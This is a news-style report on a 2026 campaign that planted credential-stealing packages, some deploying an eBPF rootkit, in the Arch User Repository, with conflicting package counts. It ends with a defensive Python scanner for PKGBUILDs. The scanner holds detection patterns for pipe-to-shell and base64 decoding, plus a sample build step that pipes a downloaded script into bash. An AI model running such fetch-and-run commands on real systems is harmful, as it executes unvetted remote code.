Unidentified attackers uploaded a large number of malicious packages to the Arch Linux Arch User Repository (AUR) earlier this month [1], [2], [3].

This breach targets a critical community-driven distribution hub, potentially exposing thousands of developers and users to system-level compromise. Because the AUR relies on user-submitted scripts, it is a significant supply-chain risk: malicious code arrives through a channel users already trust, which lets it bypass traditional security perimeters.

The attack focused on the Arch User Repository, an online package hosting platform [1], [4]. According to some reports, the attackers uploaded 1,500 malicious packages [1], [2]. Other reports estimate the number of compromised packages to be over 1,500 [3].

However, other security sources provide lower estimates. Some reports say that more than 400 packages were affected [5], while others cite a figure of 400-plus [6]. A separate report from WebProNews puts the number at 400 [7].

The primary objective of the campaign was to steal credentials from developers [5], [6]. In certain instances, the attackers used the compromise to deploy an eBPF rootkit on the infected systems [5], [6].

An eBPF rootkit is particularly dangerous because it operates within the kernel, allowing attackers to hide processes and maintain persistence without being detected by standard security tools.

The attack was first reported between June 11 and June 13, 2026 [2], [5].

This incident highlights the inherent security risks of community-maintained repositories where the barrier to entry for uploading code is low. The use of an eBPF rootkit demonstrates a high level of technical sophistication, as these tools allow attackers to manipulate the operating system kernel to evade detection. For the broader Linux ecosystem, this underscores the necessity of verifying package integrity and the dangers of trusting third-party repositories without rigorous auditing.
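
Part of the auditing mentioned above can be automated before a package is built. The following static check of a PKGBUILD is an added example, not code from the reports or from the Arch project; the rule set and the sample PKGBUILD are constructed for illustration and are not indicators from this campaign.

```python
import re

# Illustrative heuristics (assumptions), not indicators from the reported campaign.
RULES = [
    ("pipe-to-shell", re.compile(r"\b(?:curl|wget)\b[^\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("encoded-payload", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    # Source fetched over an unauthenticated transport.
    ("insecure-source", re.compile(r"(?<![A-Za-z])(?:http|ftp)://")),
    # Install scriptlet: its hooks run as root during installation.
    ("install-hook", re.compile(r"^[ \t]*install=\S+", re.M)),
]
CHECKSUMS = re.compile(r"^[ \t]*(?:sha\d+|md5|b2|ck)sums(?:_\w+)?=\((.*?)\)", re.M | re.S)

# Constructed sample PKGBUILD; every name and URL is a placeholder.
SAMPLE = """\
# Maintainer: example (constructed sample)
pkgname=demo-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("http://downloads.example.org/demo-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
install=demo-tool.install

build() {
  # curl https://example.org/old.sh | sh
  curl -fsSL https://example.org/setup.sh | bash
}
"""


def audit_pkgbuild(text):
    """Return sorted (line_number, rule) findings for one PKGBUILD."""
    # Blank out whole-line comments but keep the line numbering intact.
    lines = ["" if l.lstrip().startswith("#") else l for l in text.splitlines()]
    body = "\n".join(lines)
    findings = set()
    for name, rx in RULES:
        for m in rx.finditer(body):
            findings.add((body.count("\n", 0, m.start()) + 1, name))
    for m in CHECKSUMS.finditer(body):
        if re.search(r"\bSKIP\b", m.group(1)):  # integrity check disabled for an entry
            findings.add((body.count("\n", 0, m.start()) + 1, "checksum-skipped"))
    return sorted(findings)


if __name__ == "__main__":
    for line_no, rule in audit_pkgbuild(SAMPLE):
        print(f"PKGBUILD:{line_no}: {rule}")
```

Findings are prompts for manual review rather than verdicts: `SKIP` checksums are normal for VCS sources and many legitimate packages ship install scriptlets. A clean result does not show that a package is safe.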